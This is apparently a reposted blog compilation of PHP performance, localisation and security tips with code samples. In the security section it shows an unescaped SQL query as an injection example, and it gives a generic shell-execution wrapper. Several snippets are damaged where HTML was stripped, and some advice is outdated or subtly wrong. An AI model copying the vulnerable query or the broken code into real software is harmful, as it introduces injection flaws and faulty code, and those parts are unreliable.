博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
PHP高性能编程-提高PHP速度-加速PHP执行-PHP性能优化实践
阅读量:5798 次
发布时间:2019-06-18

本文共 54686 字,大约阅读时间需要 182 分钟。

  hot3.png

1.能用PHP数组完成的工作,绝不用文件形式来代替,数组是内存操作,内存操作速度对比文件操作快很多!

2.判断一个数值是否在一个数组中,然后决定是否追加数组内容时,不推荐使用in_array或者array_key_exists,因为函数判断都不如isset结构判断来的快!

$num = 0;$result = array();while($num < 10000){	$key = rand();		$temp = array_fill_keys($result, '');		if(!isset($temp[$key])){		$result[] = $key;		$num++;	}else{		echo '靠,这个值已经在数组中...';	}}//http://my.oschina.net/cart/

3. if ( '' == $var) 效率比 if ( $var == '') 高, if ('' === $var) 效率比 if ($var == '') 高.

4.MySql在大批量插入数据时,没有索引插入的话 速度飞快!无索引插入速度是有索引插入速度的10倍以上

5.MySql默认的latin1_swedish_ci编码存储数据在空间商要比utf8_general_ci编码存储节省空间3倍以上

如果你肯定你表存放的数据是标准的【0-9】【a-z】和标点字符时,可以考虑使用MySql默认的编码latin1_swedish_ci

因为latin1_swedish_ci编码以1字节存储,utf8_general_ci编码以3字节存储

6.善用,可以节省很多正则,有很多功能如验证email、INT、bool过滤等和检测PHP自带了,且filter_has_varisset还快一点!

==================

1. Do not use relative paths , instead define a ROOT path

Its quite common to see such lines :

require_once('../../lib/some_class.php');

This approach has many drawbacks :

It first searches for directories specified in the include paths of php , then looks from the current directory.

So many directories are checked.

When a script is included by another script in a different directory , its base directory changes to that of the including script.

Another issue , is that when a script is being run from cron , it may not have its parent directory as the working directory.

So its a good idea to have absolute paths :

define('ROOT' , '/var/www/project/');require_once(ROOT . '../../lib/some_class.php');//rest of the code

Now this is an absolute path and will always stay constant. But we can improve this further. The directory /var/www/project can change , so do we change it everytime ? No instead we make it portable using magic constants like __FILE__ . Take a closer look :

//suppose your script is /var/www/project/index.php//Then __FILE__ will always have that full path.define('ROOT' , pathinfo(__FILE__, PATHINFO_DIRNAME));require_once(ROOT . '../../lib/some_class.php');//rest of the code

So now even if you shift your project to a different directory , like moving it to an online server , the same code will run without any changes.

2. Dont use require , include , require_once or include_once

Your script could be including various files on top , like class libraries , files for utility and helper functions etc like this :

require_once('lib/Database.php');require_once('lib/Mail.php');require_once('helpers/utitlity_functions.php');

This is rather primitive. The code needs to be more flexible. Write up helper functions to include things more easily. Lets take an example :

function load_class($class_name){    //path to the class file    $path = ROOT . '/lib/' . $class_name . '.php');    require_once( $path ); }load_class('Database');load_class('Mail');

See any difference ? You must. It does not need any more explanation.

You can improve this further if you wish to like this :

function load_class($class_name){    //path to the class file    $path = ROOT . '/lib/' . $class_name . '.php');        if(file_exists($path))    {        require_once( $path );     }}

There are a lot of things that can be done with this :

Search multiple directories for the same class file.

Change the directory containing class files easily , without breaking the code anywhere.
Use similar functions for loading files that contain helper functions , html content etc.

3. Maintain debugging environment in your application

During development we echo database queries , dump variables which are creating problems , and then once the problem is solved , we comment them or erase them. But its a good idea to let everything stay and help in the long run

On your development machine you can do this :

define('ENVIRONMENT' , 'development');if(! $db->query( $query ){    if(ENVIRONMENT == 'development')    {        echo "$query failed";    }    else    {        echo "Database error. Please contact administrator";    }    }

And on the server you can do this :

define('ENVIRONMENT' , 'production');if(! $db->query( $query ){    if(ENVIRONMENT == 'development')    {        echo "$query failed";    }    else    {        echo "Database error. Please contact administrator";    }    }

4. Propagate status messages via session

Status messages are those messages that are generated after doing a task.

...

Code like that is common. Using variables to show status messages has limitations. They cannot be send via redirects (unless you propagate them as GET variables to the next script , which is very silly). In large scripts there might be multiple messages etc.

Best way is to use session to propagate them (even if on same page). For this there has to be a session_start on every page.

function set_flash($msg){    $_SESSION['message'] = $msg;}function get_flash(){    $msg = $_SESSION['message'];    unset($_SESSION['message']);    return $msg;}

and in your script :

Status is :
...

5. Make your functions flexible

function add_to_cart($item_id , $qty){    $_SESSION['cart'][$item_id] = $qty;}add_to_cart( 'IPHONE3' , 2 );

When adding a single item you use the above function. When adding multiple items , will you create another function ? NO. Just make the function flexible enough to take different kinds of parameters. Have a closer look :

function add_to_cart($item_id , $qty){    if(!is_array($item_id))    {        $_SESSION['cart'][$item_id] = $qty;    }    else    {        foreach($item_id as $i_id => $qty)        {            $_SESSION['cart'][$i_id] = $qty;        }    }}add_to_cart( 'IPHONE3' , 2 );add_to_cart( array('IPHONE3' => 2 , 'IPAD' => 5) );

So now the same function can accept different kinds of output. The above can be applied in lots of places to make your code more agile.

6. Omit the closing php tag if it is the last thing in a script

I wonder why this tip is omitted from so many blog posts on php tips.

This will save you lots of problem. Lets take an example :

A class file super_class.php

//super extra character after the closing tag

Now index.php

require_once('super_class.php');//echo an image or pdf , or set the cookies or session data

And you will get Headers already send error. Why ? because the "super extra character" has been echoed , and all headers went along with that. Now you start debugging. You may have to waste many hours to find the super extra space.

Hence make it a habit to omit the closing tag :

Thats better.

7. Collect all output at one place , and output at one shot to the browser

This is called output buffering. Lets say you have been echoing content from different functions like this :

function print_header(){    echo "
";}function print_footer(){ echo "
";}print_header();for($i = 0 ; $i < 100; $i++){ echo "I is : $i
';}print_footer();

Instead of doing like that , first collect all output in one place. You can either store it inside variables in the functions or use ob_start and ob_end_clean. So now it should look like

function print_header(){    $o = "
"; return $o;}function print_footer(){ $o = "
"; return $o;}echo print_header();for($i = 0 ; $i < 100; $i++){ echo "I is : $i
';}echo print_footer();

So why should you do output buffering :

  • You can change the output just before sending it to browser if you need to. Think about doing some str_replaces , or may be preg_replaces or may be adding some extra html at the end like profiler/debugger output
  • Its a bad idea to send output to browser and do php processing at the same time. Have you ever seen a website where there is a Fatal error in the sidebar or in a box in the middle of the screen. You know why that happens ? Because processing and output are being mixed.

8. Send correct mime types via header when outputting non-html content

Lets echo some xml.

$xml = '
';$xml = "
0
";//Send xml dataecho $xml;

Works fine. But it needs some improvement.

$xml = '
';$xml = "
0
";//Send xml dataheader("content-type: text/xml");echo $xml;

Note that header line. That line tells the browser that the content is xml content. So the browser can handle it correctly. Many javascript libraries also rely on header information.

Similarly for javascript , css , jpg image , png image :

Javascript

header("content-type: application/x-javascript");echo "var a = 10";

CSS

header("content-type: text/css");echo "#div id { background:#000; }";

9. Set the correct character encoding for a mysql connection

Ever faced a problem that unicode/utf-8 characters are stored in mysql table correctly , phpmyadmin also shows them correct , but when you fetch them and echo on your page they do not show up correctly. The secret is mysql connection collation.

$host = 'localhost';$username = 'root';$password = 'super_secret';//Attempt to connect to database$c = mysqli_connect($host , $username, $password);		//Check connection validityif (!$c) {	die ("Could not connect to the database host: 
". mysqli_connect_error());} //Set the character set of the connectionif(!mysqli_set_charset ( $c , 'UTF8' )){ die('mysqli_set_charset() failed');}

Once you connect to the database , its a good idea to set the connections characterset. This is a must when you are working with multiple languages in your application.

Otherwise what will happen ? You will see lots of boxes and ???????? in non english text.

10. Use htmlentities with the correct characterset option

Prior to php 5.4 the default character encoding used is ISO-8859-1 which cannot display characters like À â etc.

$value = htmlentities($this->value , ENT_QUOTES , 'UTF-8');

Php 5.4 onwards the default encoding will be UTF-8 which will solve most problems , but still better be aware about it if your application is multilingual.

11. Do not gzip output in your application , make apache do that

Thinking of using ob_gzhandler ? No dont do that. It doesnt make sense. Php is supposed to write your application. Dont worry about how to optimise data transfer between server and browser inside Php.

Use apache mod_gzip/mod_deflate to compress content via the .htaccess file.

12. Use json_encode when echoing javascript code from php

There are times when some javascript code is generated dynamically from php.

$images = array( 'myself.png' , 'friends.png' , 'colleagues.png');$js_code = '';foreach($images as $image){$js_code .= "'$image' ,";}$js_code = 'var images = [' . $js_code . ']; ';echo $js_code;//Output is var images = ['myself.png' ,'friends.png' ,'colleagues.png' ,];

Be smart. use json_encode :

$images = array( 'myself.png' , 'friends.png' , 'colleagues.png');$js_code = 'var images = ' . json_encode($images);echo $js_code;//Output is : var images = ["myself.png","friends.png","colleagues.png"]

Isn't that neat ?

13. Check if directory is writable before writing any files

Before writing or saving any file , make sure you check that the directory is writable or not , and flash an error message if it is not. This will save you a lot of "debugging" time. When you are working on a linux , permissions have to be dealt with and there would be many many permission issues when directories would not be writable , files would not be readable and so on.

Make sure that your application is as intelligent as possible and reports the most important information in the shortest time.

$contents = "All the content";$file_path = "/var/www/project/content.txt";file_put_contents($file_path , $contents);

That is totally correct. But has some indirect problems. The file_put_contents may fail for a number of reasons :

  • Parent directory does not exist
  • Directory exists , but is not writable
  • File locked for writing ?

So its better to make everything clear before writing out to a file.

$contents = "All the content";$dir = '/var/www/project';$file_path = $dir . "/content.txt";if(is_writable($dir)){    file_put_contents($file_path , $contents);}else{    die("Directory $dir is not writable, or does not exist. Please check");}

By doing this you get the accurate information that where is a file write failing and why

14. Change permission of files that your application creates

When working in linux environment , permission handling can waste a lot of your time. Hence whenever your php application creates some files do a chmod over them to ensure they are "accessible" outside. Otherwise for example the files may be created by "php" user and you are working as a different user and the system wont let you access or open the file , and then you have to struggle to get root privileges , change the permissions of the file and so on.

// Read and write for owner, read for everybody elsechmod("/somedir/somefile", 0644);// Everything for owner, read and execute for otherschmod("/somedir/somefile", 0755);

15. Don't check submit button value to check form submission

if($_POST['submit'] == 'Save'){    //Save the things}

The above is mostly correct , except when your application is multi-lingual. Then the 'Save' can be many different things. How would you compare then. So do not rely on the value of submit button. Instead use this :

if( $_SERVER['REQUEST_METHOD'] == 'POST' and isset($_POST['submit']) ){    //Save the things}

Now you are free from the value the submit button

16. Use static variables in function where they always have same value

//Delay for some timefunction delay(){    $sync_delay = get_option('sync_delay');    	    echo "
Delaying for $sync_delay seconds..."; sleep($sync_delay); echo "Done
";}

Instead use static variables as :

//Delay for some timefunction delay(){    static $sync_delay = null;	    if($sync_delay == null)    {	$sync_delay = get_option('sync_delay');    }	    echo "
Delaying for $sync_delay seconds..."; sleep($sync_delay); echo "Done
";}

17. Don't use the $_SESSION variable directly

Some simple examples are :

$_SESSION['username'] = $username;$username = $_SESSION['username'];

But this has a problem. If you are running multiple applications on the same domain , the session variables my conflict. 2 different applications may set the same key name in the session variable. Take for example , a frontend portal , and the backend management application , on the same domain.

Hence use application specific keys with wrapper functions :

define('APP_ID' , 'abc_corp_ecommerce');//Function to get a session variablefunction session_get($key){    $k = APP_ID . '.' . $key;       if(isset($_SESSION[$k]))    {        return $_SESSION[$k];    }        return false;}//Function set the session variablefunction session_set($key , $value){    $k = APP_ID . '.' . $key;    $_SESSION[$k] = $value;        return true;}

18. Wrap utility helper functions into a class

So you have a lot of utility functions in a file like :

function utility_a(){    //This function does a utility thing like string processing}function utility_b(){    //This function does nother utility thing like database processing}function utility_c(){    //This function is ...}

And you use the function throughout your application freely. You may want to wrap them into a class as static functions :

class Utility{    public static function utility_a()    {            }        public static function utility_b()    {            }    public static function utility_c()    {            }}//and call them as $a = Utility::utility_a();$b = Utility::utility_b();

One clear benefit you get here is if php has inbuilt functions with similar names , then names will not conflict.

Another perspective , though little advanced is that you can maintain multiple versions of the same class in the same application without any conflict. Its basically encapsulation , nothing else.

19. Bunch of silly tips

  • Use echo instead of print
  • Use str_replace instead of preg_replace , unless you need it absolutely
  • Do not use short tags
  • Use single quotes instead of double quotes for simple strings
  • Always remember to do an exit after a header redirect
  • Never put a function call in a for loop control line.
  • isset is faster than strlen
  • Format your code correctly and consistently
  • Do not drop the brackets of loops or if-else blocks.
    Do not code like this :
    if($a == true) $a_count++;

    Its absolutely a WASTE.

    Write

    if($a == true){    $a_count++;}

    Dont try to make your code shorter by eating up syntax. Rather make your logic shorter.

  • Use a proper text editor which has code highlighting. Code highlighting helps to create lesser errors.

20. Process arrays quickly with array_map

Lets say you want to trim all elements of an array. Newbies do it like this :

foreach($arr as $c => $v){	$arr[$c] = trim($v);}

But it can more cleaner with array_map :

$arr = array_map('trim' , $arr);

This will apply trim on all elements of the array $arr. Another similar function is array_walk. Check out the

documentation on these to know more.

21. Validate data with php filters

Have you been using to regex to validate values like email , ip address etc. Yes everybody had been doing that. Now lets

try something different, called filters.

The php filter extension provides simple way to validate or check values as being a valid 'something'.

22. Force type checking

$amount = intval( $_GET['amount'] );$rate = (int) $_GET['rate'];

Its a good habit.

23. Write Php errors to file using set_error_handler()

set_error_handler() can be used to set a custom error handler. A good idea would be write some important errors in a file for logging purpose

24. Handle large arrays carefully

Large arrays or strings , if a variable is holding something very large in size then handle with care. Common mistake is to create a copy and then run out of memory and get a Fatal Error of Memory size exceeded :

$db_records_in_array_format; //This is a big array holding 1000 rows from a table each having 20 columns , every row is atleast 100 bytes , so total 1000 * 20 * 100 = 2MB$cc = $db_records_in_array_format; //2MB moresome_function($cc); //Another 2MB ?

The above thing is common when importing a csv file or exporting table to a csv file

Doing things like above can crashs scripts quite often due to memory limits. For small sized variables its not a problem , but must be avoided when handling large arrays.

Consider passing them by reference , or storing them in a class variable :

$a = get_large_array();pass_to_function(&$a);

by doing this the same variable (and not its copy) will be available to the function. Check

class A{    function first()    {        $this->a = get_large_array();        $this->pass_to_function();    }    function pass_to_function()    {        //process $this->a    }}

unset them as soon as possible , so that memory is freed and rest of the script can relax.

Here is a simple demonstration of how assign by reference can save memory in some cases

';$b = $a;$b[0] = 'B';echo 'Memory usage in MB after 1st copy : '. memory_get_usage() / 1000000 . '
';$c = $a;$c[0] = 'B';echo 'Memory usage in MB after 2st copy : '. memory_get_usage() / 1000000 . '
';$d =& $a;$d[0] = 'B';echo 'Memory usage in MB after 3st copy (reference) : '. memory_get_usage() / 1000000 . '
';

The output on a typical php 5.4 machine is :

Memory usage in MB : 18.08208
Memory usage in MB after 1st copy : 27.930944 27.930944
Memory usage in MB after 2st copy : 37.779808 37.779808
Memory usage in MB after 3st copy (reference) : 37.779864 37.779864

So it can be seen that in the 3rd copy which was by reference memory was saved. Otherwise in all plain copies memory is used up more and more.

25. Use a single database connection, throughout the script

Make sure that you use a single connection to your database throughout your script. Open a connection right in the beginning and use it till the end , and close it at the end. Do not open connections inside functions like this :

function add_to_cart(){    $db = new Database();    $db->query("INSERT INTO cart .....");}function empty_cart(){    $db = new Database();    $db->query("DELETE FROM cart .....");}

Having multiple connections is a bad idea and moreover they slow down the execution since every connection takes time to create and uses more memory.

Use the singleton pattern for special cases like database connection.

26. Avoid direct SQL query , abstract it

$query = "INSERT INTO users(name , email , address , phone) VALUES('$name' , '$email' , '$address' , '$phone')";$db->query($query); //call to mysqli_query()

The above is the simplest way way of writing sql queries and interacting with databases for operations like INSERT, UPDATE, DELETE etc. But it has few drawbacks like:

  • All values have to be escaped everytime manually
  • Manually verify the sql syntax everytime.
  • Wrong queries may go undetected for a long time (unless if else checking done everytime)
  • Difficult to maintain large queries like that

Solution: ActiveRecord

It involves writing simple functions that abstract the generation of sql queries, hence avoid writing of direct sql queries.

A very simple example of an activerecord insert function can be like this :

function insert_record($table_name , $data){    foreach($data as $key => $value)    {	//mysqli_real_escape_string        $data[$key] = $db->mres($value);    }		    $fields = implode(',' , array_keys($data));    $values = "'" . implode("','" , array_values($data)) . "'";        //Final query	    $query = "INSERT INTO {$table}($fields) VALUES($values)";		    return $db->query($query);}//data to be inserted in database$data = array('name' => $name , 'email' => $email  , 'address' => $address , 'phone' => $phone);//perform the INSERT queryinsert_record('users' , $data);

The above example shows how to insert data in a database, without actually having to write INSERT statements. The function insert_record takes care of escaping data as well. A big advantage here is that since the data is being prepared as a php array, any syntax mistake is caught instantly (by the php interpreter ofcourse).

This function can be part of a database class, and callable like this $db->insert_record(). Similar functions can be written for update, select, delete as well. Should be a good practise.

27. Cache database generated content to static files

Pages that are generated by fetching content from the database like cms etc, can be cached. It means that once generated, a copy of it can be writted to file. Next time the same page is requested, then fetch it from the cache directory, dont query the database again.

Benefits :

  • Save php processing to generate the page , hence faster execution
  • Lesser database queries means lesser load on mysql database

28. Store sessions in database

File based sessions have many limitation. Applications using file based sessions cannot scale to multiple servers, since files are stored on a single server. But database can be access from multiple servers hence the the problem is solved there. Also on shared hosting, the session files reside in the tmp directory, which is readable by other accounts. This can be a security issue.

Storing session in database makes many other things easier like:

  • Restrict concurrent logins from same username. Same username cannot log in from 2 different places at same time
  • Check online status of users more accurately

29. Avoid using globals

  • Use defines/constants
  • Get value using a function
  • Use Class and access via $this

30. Use base url in head tag

Quick example :

        

The base tag is like a 'ROOT' url for all relative urls in the html body. Its useful when static content files are organised into directories and subdirectories.

Lets take an example

www.domain.com/store/home.php

www.domain.com/store/products/ipad.php

In home.php the following can be written :

HomeIpad

But in ipad.php the links have to be like this :

HomeIpad

This is because of different directories. For this multiple versions of the navigation html code has to be maintained. So the quick solution is base tag.

HomeIpad

Now this particular code will work the same way in the home directory as well as the product directory. The base href value is used to form the full url for home.php and products/ipad.php

31. Manage error reporting

error_reporting is the function to use to set the necessary level of error reporting required.

On a development machine notices and strict messages may be disabled by doing.

ini_set('display_errors', 1);error_reporting(~E_NOTICE & ~E_STRICT);

On production , the display should be disabled.

ini_set('display_errors', 0);error_reporting(~E_WARNING & ~E_NOTICE & ~E_STRICT);

It is important to note that error_reporting should never be set to 0 on production machines. Atleast E_FATALs have to be known. Just switch off the display using the display_errors directive. If error_reporting is set to 0, errors wont be raised at all keeping all problems in the dark.

After the display is switched off, the errors should be logged to a file for later analysis. This can be done inside the script using init_set.

ini_set('log_errors' , '1');ini_set('error_log' , '/path/to/errors.txt');ini_set('display_errors' , 0);error_reporting(~E_WARNING & ~E_NOTICE & ~E_STRICT);

Note :

1. The path '/path/to/errors.txt' should be writable by the web server for errors to be logged there.

2. A separate error file is specified , otherwise all logs would go inside the apache/web server error log and get mixed up with other apache errors.

3. Also since it is being setup in the current application , the error log will contain the errors of only the current application (there may be other applications running on the webserver).

4. The path can be somewhere inside the directory of the current application as well , so that the system directories like /var/log dont have to searched.

5. Dont set error_reporting to 0. It will not log anything then.

Alternatively set_error_handler should be used to set a custom user written function as the error handler. That particular function, for example can log all errors to a file.

Set 'display_errors=On' in php.ini on development machine

On development machine its important to enable display_errors right in the php.ini (and not rely on ini_set)

This is because any compile time fatal errors will now allow ini_set to execute , hence no error display
and a blank WHITE page.

Similarly when they are On in php.ini , switching it off in a script that has fatal errors will not work.

Set 'display_errors=Off' in php.ini on production machine

Do not rely on init_set('display_errors' , 0); simply because it will not get executed if any compile time fatal errors come in the script , and errors will be displayed right away.

32. Be aware of platform architecture

The length of integers is different on 32 and 64 bit architectures. So functions like strtotime give different results.

On a 64 bit machine you can see such output.

$ php -aInteractive shellphp > echo strtotime("0000-00-00 00:00:00");-62170005200php > echo strtotime('1000-01-30');-30607739600php > echo strtotime('2100-01-30');4104930600

But on a 32 bit machine all of them would give bool(false). Check  for more.

What would happen if an integer is left shifted more than 32 bits ? the result would be different on different machines.

33. Dont rely on set_time_limit too much

If you are limiting the maximum run-time of a script , by doing this :

set_time_limit(30);//Rest of the code

It may not always work. Any execution that happens outside the script via system calls/os functions like socket operations, database operations etc. will not be under control of set_time_limit.

So if a database operation takes lot of time or "hangs" then the script will not stop. Dont be surprised then. Make better strategies to handle the run-time.

34. Make a portable function for executing shell commands

system , exec , passthru , shell_exec are the 4 functions that are available to execute system commands. Each has a slightly different behaviour. But the problem is that when you are working on shared hosting environments some of the functions are selectively disabled. Most newbie programmers tend to first find out which function is enabled and then use it.

A better solution :

/**	Method to execute a command in the terminal	Uses :	1. system	2. passthru	3. exec	4. shell_exec*/function terminal($command){	//system	if(function_exists('system'))	{		ob_start();		system($command , $return_var);		$output = ob_get_contents();		ob_end_clean();	}	//passthru	else if(function_exists('passthru'))	{		ob_start();		passthru($command , $return_var);		$output = ob_get_contents();		ob_end_clean();	}	//exec	else if(function_exists('exec'))	{		exec($command , $output , $return_var);		$output = implode("n" , $output);	}	//shell_exec	else if(function_exists('shell_exec'))	{		$output = shell_exec($command) ;	}	else	{		$output = 'Command execution not possible on this system';		$return_var = 1;	}	return array('output' => $output , 'status' => $return_var);}terminal('ls');

The above function will execute the shell command using whichever function is available , keeping your code consistent.

35. Localize your application

. Format dates and numbers with commas and decimals. Show the time according to timezone of the user.

36. Use a profiler like xdebug if you need to

Profilers are used to generate reports that show the time is taken by different parts of the code to execute. When writing large application where lots of libraries and other resources are working to do a cetain task, speed might be an important aspect to optimise.

Use profilers to check how your code is performing in terms of speed. Check out xdebug and webgrind.

37. Use plenty of external libraries

An application often needs more than what can be coded with basic php. Like generating pdf files, processing images, sending emails, generating graphs and documents etc. And there are lots of libraries out there for doing these things quickly and easily.

Few popular libraries are :

  • mPDF - Generate pdf documents, by converting html to pdf beautifully.
  • PHPExcel - Read and write Excel files
  • PhpMailer - Send html emails with attachments easily
  • pChart - Generate graphs in php

38. Have a look at phpbench for some micro-optimisation stats

If you really want to achieve optimisation at the level of microtime then check  ... it has some benchmarks for various syntax variations that can create significant difference.

39. Use an MVC framework

Its time to start using an MVC (Model view controller) framework like codeigniter. MVC does not make your code object oriented rightaway. The first thing they do is separate the php code from html code.

  • Clean separation of php and html code. Good for team work, when designers and coders are working together.
  • Functions and functionalities are organised in classes making maintenance easy.
  • Inbuilt libraries for various needs like email, string processing, image processing, file uploads etc.
  • Is a must when writing big applications
  • Lots of tips, techniques, hacks are already implemented in the framework

40. Read the comments on the php documentation website

The php documentation website has entries for each function, class and their methods. All those individual pages have got lots of user comments below them that contain a whole lot of valuable information from the community.

They contain user feedback, expert advice and useful code snippets. So check them out.

41. Go to the IRC channel to ask

The irc channel #php is the best place online to ask about php related things. Although there are lots of blogs, forums out there and even more coming up everyday, still when a specific problem arises the solution might not be available there. Then irc is the place to ask. And its totally free!!

42. Read open source code

Reading other open source applications is always a good idea to improve own skills if you have not already. Things to learn are techniques, coding style, comment style, organisation and naming of files etc.

The first open source thing that I read was the codeigniter framework. Its easy to developers to use, as well as easy to look inside. Here are a few more

1. 

2. 
3. 

43. Develop on Linux

If you are already developing on windows, then you might give Linux a try. My favorite is ubuntu. Although this is just an opinion but still I strongly feel that for development linux is a much better environment.

Php applications are mostly deployed on linux (LAMP) environments. Therefore, developing in a similar environment helps to produce a robust application faster.

Most of the development tools can be very easily installed from synaptic package manager in Ubuntu. Plus they need very little configuration to setup and run. And the best thing is, that they all are free.

===================

1. Set timezone of the application

The application should explicitly set a timezone for itself. Otherwise the timezone of the machine/server would be taken up, which may not be what the user wants.

date_default_timezone_set( 'America/Chicago' );

This should be done at the earliest in the script.

The timezone_identifiers_list() function can be used to generate a list of timezones from which the user can select. Here is a quick example :

/**	@brief	Get a list of timezones available for use in the application*/function get_timezones(){	$o = array();	$t = timezone_identifiers_list();		foreach($t as $a)	{		$t = '';				//Get the time difference		$zone = new DateTimeZone($a);		$seconds = $zone->getOffset( new DateTime("now", $zone) );		$hours = sprintf( "%+02d" , intval($seconds/3600));		$minutes = sprintf( "%02d" , ($seconds%3600)/60 );				$t = $a ."  [ $hours:$minutes ]" ;		$o[$a] = $t;	}	ksort($o);		return $o;}

This would give you a complete list like this :

[Africa/Abidjan] => Africa/Abidjan [ +0:00 ]
[Africa/Accra] => Africa/Accra [ +0:00 ]
[Africa/Addis_Ababa] => Africa/Addis_Ababa [ +3:00 ]
[Africa/Algiers] => Africa/Algiers [ +1:00 ]
[Africa/Asmara] => Africa/Asmara [ +3:00 ]
[Africa/Bamako] => Africa/Bamako [ +0:00 ]
[Africa/Bangui] => Africa/Bangui [ +1:00 ]
[Africa/Banjul] => Africa/Banjul [ +0:00 ]
[Africa/Bissau] => Africa/Bissau [ +0:00 ]

Make a select tag dropdown out of it and let the user select his/her timezone.

2. Set the mysql timezone from the application

Applications are often hosted on servers that are in a different timezone , compared to that of the developer or the application user. Hence the timezone of mysql needs to be set properly to that of the application.

Mysql can be put in the same timezone as the application by doing :

$c = mysqli_connect($host, $username, $password);mysqli_query($c , "SET `time_zone` = '".date('P')."'");

The php date function with P parameter gives the time difference between GMT and the applications timezone. The same is passed to mysql.

TIMESTAMP

For timestamp columns in mysql , any date-time combinations passed would be converted to correct timestamp by mysql , since mysql itself is in the correct timezone.

DATETIME

When using datetime columns , the application must convert the date-time values to UTC , and then save in mysql.

When fetching back from database they must be converted to the application's timezone.

Save to database :

$time_to_save = date('Y-m-d h:i:s');	//Current time of user that is to be saved in a datetime mysql column$d = new DateTime($time_to_save , new DateTimeZone(date_default_timezone_get()) );$d->setTimezone( new DateTimeZone('UTC') );	//Move to UTC$mysql_datetime = $d->format("Y-m-d h:i:s");	//BUZZ!! Ready to save datetime value in database

Note :

1. Since the mysql timezone is being set from within the application , certain queries may give tricky output. Here is an example :

You are developing an application on your local system and have set the timezone to 'Asia/Singapore' , but your own computer's timezone is 'Asia/Kolkata'

Now inside your application you are running a certain query :

$time_schedule = "2012-04-13 10:30:00"$query = "SELECT * FROM table WHERE time_schedule = '$time_schedule'";//Execute the query//some rows

When you run the same query in phpmyadmin or mysql terminal and you might get different output/rows selected.

This happens because timezone of application+mysql is different from mysql outside. You application sees different time in the database column time_schedule and phpmyadmin/mysql terminal sees a different time.

3. Set collation for database at the time of creation

The collation of the database should be set to the correct one , right in the beginning.

ALTER DATABASE db_name CHARACTER SET utf8 COLLATE utf8_unicode_ci;

Or modify it from the Operations tab in phpmyadmin. Setting the collation and character set in the beginning ensures that all later tables, columns take up the same by default.

4. Set character set of mysql connection object

When the application is displaying non english charaters , then it must set the mysql connection's character encoding. Its simple :

mysqli_set_charset ( $c , 'UTF8' );

5. Set correct character set for htmlentities

Function htmlentities is used to echo content , that was previously provided by the user.

Prior to php 5.4 the default character encoding used is ISO-8859-1 which cannot display languages like hindi , bengali , russian etc.

$value = htmlentities($value , ENT_QUOTES , 'UTF-8');echo $value;

Php 5.4 onwards the default encoding will be UTF-8 which will solve most problems , but still better be aware about it if your application is multilingual.

The function mb_list_encodings can be used to generate a list.

/**	@brief	Get the list of supported encodings using the mb_list_encodings function*/function get_supported_encodings(){	$e = mb_list_encodings();		$list = array();		foreach($e as $c => $val)	{		$list[$val] = $val;	}		return $list;}

Would generate a list like this :

[UTF-32BE] => UTF-32BE
[UTF-32LE] => UTF-32LE
[UTF-16] => UTF-16
[UTF-16BE] => UTF-16BE
[UTF-16LE] => UTF-16LE
[UTF-8] => UTF-8
[UTF-7] => UTF-7
[UTF7-IMAP] => UTF7-IMAP
[ASCII] => ASCII
[EUC-JP] => EUC-JP
[SJIS] => SJIS

Select one and save in the database.

6. Set encoding for non html content by sending the correct headers

When echoing content like css , javascript , xml etc. set the correct encoding via the header function like this :

XML

header('Content-Type: text/xml; charset=utf-8');
//Echo rest of the xml content

Javascript

header('Content-Type: text/javascript; charset=utf-8');
//Echo rest of the javascript content

7. Set correct character set for html and xml output

HTML : This goes in the head tag of an html document

html5 supports :

XML : The first line of an xml document has the encoding specified

8. Set correct locale

Locale settings provide useful locale related settings like how to format numbers , currency symbol etc. The correct locale for the application should be setup as early as possible in the script.

setlocale(LC_ALL, 'en_US.UTF-8');

Provide the user with a list of locales to select from. Check  to learn how to do that.

9. Format numbers according to locale

When displaying numbers like plain number or currency numbers , format them with comma , decimal etc properly using function money_format. Here is a quick example :

$amount = '100000';//Format numbers in Indian format - Lakh , Croresetlocale(LC_MONETARY, 'en_IN');$am = money_format('%!i', $amount);echo $am;    //1,00,000.00//Format in million , billionecho "
";setlocale(LC_MONETARY, 'en_US.utf8');$am = money_format('%!i', $amount);echo $am; //100,000.00

10. Format display of dates

. Some different kind of date formats used are

ISO Format : 2012-04-13 (YYYY-MM-DD) Asian countries : 13-04-2012 (DD-MM-YYYY) USA : 04-13-2012 (MM-DD-YYYY)

Dates have to be formatted both when displaying and when being entered in a form.

Form entry : 13/04/2012 or 04/13/2012 Display : 13 Apr 2012 or Apr 13, 2012

Formatting date with strftime :

$format = '%d-%b-%Y';$stamp = time();$display_format = strftime( $format , $stamp);echo $display_format; 	//Output 14-04-2012

Formatting with DateTime object :

$t = date('Y-m-d h:i:s');$d = new DateTime($t , new DateTimeZone(date_default_timezone_get()) );$display_format = $d->format("d-m-Y");echo $display_format;    //15-04-2012

User should be have the option to select formats for displaying date and entering dates in forms. The user selected format , for example d-m-Y can be saved in database and reloaded next time.

11. Make the application multilingual

Finally change the language of the application to what the user wants. There are many ways to make your application multilingual. One way is to collect all label text in your application and fetch the translations from google translate service. Find out more on google.

Conclusion

Applications should be localised properly for better user experience. Applications should allow the user to select the localisation settings like timezone , locale , language , date display format etc.

================

1. Avoid short tags

If they are disabled on some server , then all of a sudden the whole php code will be displayed even before you are informed about it.

This will run fine when short codes are enabled, but when not, the whole code will be dumped to the browser.

As of php 5.4 the short echo tags (

Also enable short tags on your server.

2. Validate all user input

All input coming from the user , in the form of POST and GET must be validated to be acceptable by the application logic.

  • Check the 'type' of the data
  • Check range of numbers
  • Check length of strings
  • Check emails , urls , dates to be valid
  • Ensure that data does not contain unallowed characters.

Few functions to filter/validate data :

htmlentities()strip_tags ()utf8_decode ()htmlspecialchars()ctype_digit()ctype_alnum()stripslashes()str_replace()

3. Escape query data

Escape all data that goes inside a query and for the better avoid direct sql queries in your application.

Use somekind of abstraction like activerecord etc.

One small sql injection vulnerability is enough to allow a hacker to completely take over the system. Tools like sqlmap take only a few minutes to this. So if there is even a single page with a sql injection vulnerability in the whole site for example

http://www.site.com/path/page.php?id=5

where the id is being used in an sql query and is not escaped, this is a door big enough to allow a hacker to do anything on your system. So be very aware of sql queries and ensure everything is secure.

This is how a vulnerable sql query looks like

$id = $_GET['id'];$this->db->query("SELECT * FROM pages WHERE id = '$id'");

The id parameter should be escaped by using appropriate functions like mysqli_real_escape_string() before putting them in the query.

4. Cross site scripting

Cross site scripting allows a hacker to inject client-side code in a webpage. For example take the url

search.php?term=ipad

And that the php code for the script is

...Search results for :
...

The above piece of code looks quite OK except that the user input in $term is being echoed directly back.

Consider the url

search.php?term=

